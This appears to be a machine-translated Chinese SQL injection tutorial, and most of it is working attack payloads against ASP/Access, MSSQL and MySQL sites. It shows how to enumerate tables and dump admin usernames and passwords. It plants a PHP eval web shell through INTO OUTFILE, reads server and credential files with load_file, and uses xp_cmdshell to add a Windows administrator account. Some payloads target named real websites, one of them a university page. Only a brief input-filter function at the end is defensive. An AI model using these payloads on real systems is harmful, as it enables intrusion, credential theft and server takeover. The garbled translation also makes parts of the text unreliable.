SQL Injection Quick Start v1.0 (continuous update)

SQL Injection Quick Start v1.0 (continuous update)

Note: All the quotation marks in this article are Chinese quotation marks for aspect viewing.

1. Step 1: Introduction to common databases ASP + access ASP + mssql PHP + mysql

Like this link http://www.19cn.com/showdetail.asp? Id = 49
The server will return the following error after a single quotation mark is added.

Microsoft JET Database Engine error '80040e14' the syntax of the string is incorrect in the query expression 'id = 49. /Showdetail. asp, row 8

We can see from the above
1. The website uses an Access database and connects to the database through the JET engine, instead of using ODBC.
2. The program does not determine whether the data submitted by the client meets the program requirements.
3. The table queried by this SQL statement has a field named ID.

2. The second step determines whether SQL injection can be divided into three types:

Number Type
ID = 49 These injection parameters are numeric. The SQL statement is roughly as follows:
Select * from table name where field = 49
The injected parameter is ID = 49 And [query condition], that is, the generated statement:
Select * from table name where field = 49 And [query condition]

Character Type
Class = the injection parameters of the series are generic. The SQL statements are roughly as follows:
Select * from table name where field = 'series'
The injected parameter is
Class = series and [query conditions] and ''= ', that is, the generated statement:
Select * from table name where field = 'series' and [query conditions] and ''=''

Search type
Keyword = keyword. The original appearance of the SQL statement is roughly as follows:
Select * from table name where field like '% keyword %'
The injected parameter is keyword = 'and [query condition] and' % 25' = ', which is the generated statement:
Select * from table name where field like '%' and [query condition] and '%' = '%'

In addition to the first step, the method is too simple, there are more ways to determine whether the point can be SQL injection, there are many other methods, this chapter will be dynamically updated
Example

Digital 1. http://www.19cn.com/showdetail.asp? Id = 49 2. http://www.19cn.com/showdetail.asp? Id = 49 and 1 = 1 3. http://www.19cn.com/showdetail.asp? Id = 49 and 1 = 2 small 2. http://www.19cn.com/showdetail.asp? Class = series 'and' = '3. http://www.19cn.com/showdetail.asp? Class = series 'and' 2' = 'search type 2. keyword = 'and' % 25' = '3. keyword = 'and' % 24' ='

Yes

① Normal display (this is inevitable, or the program is wrong)
② Normally displayed, the content is basically the same as ①
③ Prompt BOF or EOF (when the program does not make any judgment), or prompt that the record cannot be found (rs is determined. eof), or the display content is null (the program adds on error resume next)

Cannot be injected

① It is displayed normally. ② and ③ There are generally Program-defined error prompts or error prompts during type conversion.

3. Step 3: Determine the database type starting with the SQL Server System Variables

Digital type http://www.19cn.com/showdetail.asp? Id = 49and user> 0 small http://www.19cn.com/showdetail.asp? Class = article 'and user> 0and'' = 'search-type keywords = 'and user> 0and' % 25' ='

 

User is a built-in variable of SQLServer. Its value is the username of the current connection and its type is nvarchar. When a nvarchar value is compared with the int value 0, the system will first try to convert the nvarchar value to the int type, and an error will certainly occur during the conversion process. The error message of SQLServer is: A syntax error occurs when converting nvarchar value "abc" to an int column. abc is the value of the variable user and obtains the username of the database.
Note: If you log on to the sa, an error occurs when the "dbo" column is converted to the int type, instead of the "sa" column ".

If an error is reported When IIS is disabled, start with Access and SQLServer.

Access is in the system table msysobjects, but when you read the table in the Web environment, the system prompts "no permission ".
SQLServer is in the sysobjects table and can be read normally in the Web environment.

Digital type http://www.19cn.com/showdetail.asp? Id = 49 and (select count (*) from sysobjects)> 0 http://www.19cn.com/showdetail.asp? Id = 49and (select count (*) from msysobjects)> 0

The page of the first web site of SQLServer is roughly the same as that of the original web site. However, the second web site prompts an error because the table msysobjects cannot be found, even if the program has fault tolerance, the page is also completely different from the original page.
The page of the first web site of Access is completely different from the original page. The second web site depends on whether the database settings allow reading the system table. In general, Access is not allowed, therefore, it is completely different from the original website. In most cases, the database type used by the system can be known through the first web site. The second web site is used only for verification when the IIS error prompt is enabled.

MYsql to be supplemented

4. Step 4: Guess the table name, field, value, and field name

Number ID = 49 And (Select Count (*) fromAdmin)> = 0 character Class = series and (Select Count (*) fromAdmin)> = 0and ''= 'search type keyword = 'and (Select Count (*) fromAdmin)> = 0and' % 25' ='

If the page is the same as that of ID = 49, the additional conditions are true, that is, the table Admin exists, and vice versa (Please remember this method ). This loop ends until the table name is guessed. After the table name is guessed, replace Count (*) with Count (field name) and use the same principle to guess the field name.

Length of the field to be guessed

Ascii verbatim Decoding
For example, we know that the username field exists in the Admin table. First, we take the first record and test the length.

 

Digital. asp? Id = 49 and (select top 1len (username) fromAdmin)> 0

First, describe the principle: if the length of top 1's username is greater than 0, then the condition is true; then, the test goes on like> 1,> 2,> 3 until the condition is not true, for example, if 7 is true or 8 is not true, It means len (username) = 8.
Of course, no one will be stupid from 0, 1, 2, 3 tests one by one, so how can we get started quickly. After obtaining the length of username, use mid (username, N, 1) to intercept the nth character, and then asc (mid (username, N, 1) to obtain the ASCII code, for example:

Number id = 49 and (select top 1 asc (mid (username, 1, 1) from Admin)> 0

Asc (mid (s, I, 1), first look at mid, s represents a string of characters, assuming s = digcvx, then I indicates that from the string of s I start to get, 1 indicates taking one, so mid (s, I, 1) = I, and so on, mid (a, v, 3), a = zxcgvertg, then mid (a, v, 3) = ver. Then asc represents the ASCII code of the first character of the string expression, that is, the ASCII code of I.

Access: asc (character) SQLServer: unicode (character)
Purpose: return the ASCII code of a character.
Access: chr (number) SQLServer: nchar (number)
Function: opposite to asc, returns Characters Based on the ASCII code.
Access: mid (string, N, L) SQLServer: substring (string, N, L)
Purpose: return the substring of the string that starts from N characters and ranges from N to N + L.
Access: abc (number) SQLServer: abc (number)
Purpose: return the absolute value of a number (used to guess Chinese characters)
Access: A between B And C SQLServer: A between B And C
Purpose: Determine whether A is between B and C.
Chinese Processing Method
It is common to encounter Chinese characters during injection. Some people may want to retreat when they encounter Chinese characters. In fact, as long as you have some knowledge about Chinese encoding, "Chinese phobias" can be quickly overcome.
First, let's talk about common sense:
Access in progress, The Chinese ASCII code may have a negative number. After this negative number is obtained, use abs () to take the absolute value, and the Chinese characters remain unchanged.
SQL ServerChinese ASCII is a positive number, but because it is a UNICODE double-bit encoding, the function ascii () cannot be used to obtain the ASCII code, must use the function unicode () to return the unicode value, use the nchar function to obtain the corresponding Chinese characters.

Dedicated for mysql

Mysql injection science http://drops.wooyun.org/tips/123

Mysql Injection Process http://www.rising.com.cn/newsletter/news/2012-05-24/11580.html

Mysql injection common variable name http://database.51cto.com/art/201011/235407.htm
Violent Field Length

Order by num/*

 

Matching Field

and 1=1union select 1,2,3,4,5…….n/*

Violent field location

and 1=2union select 1,2,3,4,5…..n/*

Using built-in function brute-force database information

version() database() user()

You do not need to guess the available field brute-force database information (some websites are not applicable ):

and1=2 union all select version() /* and1=2 union all select database() /* and1=2 union all select user() /*

 

Operating system information:

 

and1=2 union all select @@global.version_compile_os from mysql.user /*

Database permissions:

Andord (mid (user (), 114) =/* return normal description as root

Brute-force database (mysql> 5.0)
Mysql 5 and above have the built-in database information_schema, which stores all the database and table structure information of mysql.

and 1=2union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

Guess tableDatabase (hexadecimal), limit 0 (0 is the first start record, show 1 record)

And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA = database limit 0, 1-

 

Guess FieldTable Name (hexadecimal)

And 1 = 2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME = table name limit 0, 1

Brute force password

And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1

Advanced usage (two data contents are displayed for one available field ):

Union select 1, 2, 3 concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1

Write horse directly (Root permission)
Condition:
1. Know the physical path of the site
2. Have sufficient permissions (you can use select .... From mysql. user test)
3. magic_quotes_gpc () = OFF

Select 'eval ($ _ POST [cmd])?> 'Into outfile' physical path 'and1 = 2 union all select statement HEX value into outfile' path'

 

Load_file () common paths:

1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20) 2. replace (load_file (char (47,101,116, 115,115,119,100 )), char (60), char (32) the above two are to view the Code fully displayed in a PHP file. in some cases, do not replace some characters. For example, if "<" is replaced with "space", the webpage is returned. the Code cannot be viewed. 3. load_file (char (47) can list FreeBSD, Sunos system root directory 4,/etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf: view the configuration file of the linux APACHE Virtual Host 5, c: \ Program Files \ Apache Group \ Apache \ conf \ httpd. conf or C: \ apache \ c Onf \ httpd. conf: view the apache files 6 and c:/Resin-3.0.14/conf/resin in WINDOWS. conf. 7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf: view the JSP virtual host configured in linux 8, d: \ APACHE \ Apache2 \ conf \ httpd. conf 9, C: \ Program Files \ mysql \ my. ini 10 ,.. /themes/darkblue_orange/layout. inc. php phpmyadmin burst path 11, c: \ windows \ system32 \ inetsrv \ MetaBase. xml to view the IIS virtual host configuration file 12,/usr/local/resin-3.0.22/conf/resin. Conf for the RESIN configuration file 3.0.22 view 13,/usr/local/resin-pro-3.0.22/conf/resin. conf same as above 14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE virtual host view 15,/etc/sysconfig/iptables this view firewall policy 16, usr/local/app /php5 B/php. ini PHP's equivalent settings 17,/etc/my. cnf MYSQL configuration file 18,/etc/redhat-release Red Hat system version 19, C: \ mysql \ data \ mysql \ user. MYD in MYSQL System User Password 20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP. 21./usr/local/ap P/php5 B/php. ini // PHP related settings 22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf // virtual website settings 23, C: \ Program Files \ RhinoSoft.com \ Serv-U \ ServUDaemon. ini 24, c: \ windows \ my. ini 25, c: \ boot. config. inc. php, config. php. When load_file (), replace (load_file (HEX), char (60), char (32) should be used. Note: Char (60) represents <Char (32) represents space.

 

Problems with manual injection:
After the injection, the page displays:
Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation 'Union'
For example:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20
This is caused by inconsistent pre-and post-encoding,
Solution: Add unhex (hex (parameter) before the parameter. The above URL can be changed:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3, 4, unhex (hex (user () % 20
You can continue the injection.

5. Experience Summary

Deep understanding of SQL Injection bypassing waf and filtering mechanisms http://drops.wooyun.org/tips/968

Attackers can bypass program restrictions to continue injection.
When 'filtering can be modified, it can be replaced by ASCII code.
Where xtype = 'U', replaced by where xtype = char (85;
Where name = 'user' can be replaced by where name = nchar (29992) + nchar (25143.
Experience Summary
1. Some people will filter keywords such as Select, Update, and Delete, but they forget to be case sensitive. So you can try using selecT.
2. If you cannot guess the field name, you can view the logon form on the website. Generally, for convenience, the field names are the same as those in the form input box.
3. Note: The + number in the address bar is interpreted as a space, % 2B is interpreted as a + number, and % 25 is interpreted as a % number. For details, refer to the introduction of URLEncode.
4. When the Get method is used for injection, IIS will record all your submission strings and will not record the Post method. Therefore, try not to use Get for Post URLs.

You can only use the Ascii literal decoding method to guess Access. SQLServer can also use this method. You only need the difference between the two methods. However, if you can use the SQLServer error information to expose the value, the efficiency and accuracy will be greatly improved. 6. Use System tables to inject SQL Server databases

① Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net user name password/add "--
Semicolons (;); In SQLServer, separate the first and second statements, which indicate that the subsequent statements are comments. Therefore, this statement is divided into two statements for execution in SQLServer, first Select the record with ID = 1, and then execute the Stored Procedure xp_mongoshell. This stored procedure is used to call system commands. Therefore, run the "net" command to create a windows account with the username and password, and then:
② Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net localgroup name administrators/add "--
Add the new account name to the Administrator Group. It does not take two minutes. You have obtained the highest system permission! Of course, this method only applies when using sa to connect to the database. Otherwise, you do not have the permission to call xp_mongoshell.
③ Http: // Site/url. asp? Id = 1; and db_name ()> 0
In the preceding example, and user> 0 is used to obtain the connection username. db_name () is another system variable and returns the name of the connected database.
④ Http: // Site/url. asp? Id = 1; backup database name to disk = 'C: \ inetpub \ wwwroot \ 1. db ';--
This is a tough trick. Back up the database name obtained from ③ and the absolute path exposed by some IIS errors to the Web directory, use HTTP to download the entire database. All administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can back up the network address (for example, \ 202.96.xx.xx \ Share \ 1.db), but the success rate is not high.
⑤ Http: // Site/url. asp? Id = 1; and (Select Top 1 name from sysobjects where xtype = 'U' and status> 0)> 0
As mentioned above, sysobjects is a system table of SQLServer. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0, indicates the name of the table created by the user. The preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message. 2. How can I obtain the name of the third table? Let's leave it to our smart readers.
⑥ Http: // Site/url. asp? Id = 1; and (Select Top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0
After obtaining the table name from ⑤, use object_id ('table name') to obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table, replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.
The above six points are the painstaking efforts I have studied SQLServer for more than half a year. We can see that the degree of understanding of SQLServer directly affects the success rate and the speed of guessing. After studying SQLServer injection, my development level has also been greatly improved. Haha, maybe security and development are complementary.

7. Summary of defense methods ASP

In place of the Request function in ASP, You can inject Say NO to all SQL statements. The function is as follows:

Function SafeRequest (ParaName, ParaType) '--- input parameter --- 'paraname: parameter name-numeric type 'paratype: parameter type-numeric type (1 indicates that the preceding parameter is a number, 0 indicates that the preceding parameter is a character) Dim ParaValue = Request (ParaName) If ParaType = 1 thenIf ParaValue = "" ornot isNumeric (ParaValue) then Response. write "parameter" & ParaName & "must be in numeric format! "Response. endEndifElse ParaValue = replace (ParaValue," '"," ''") Endif SafeRequest = ParaValue Endfunction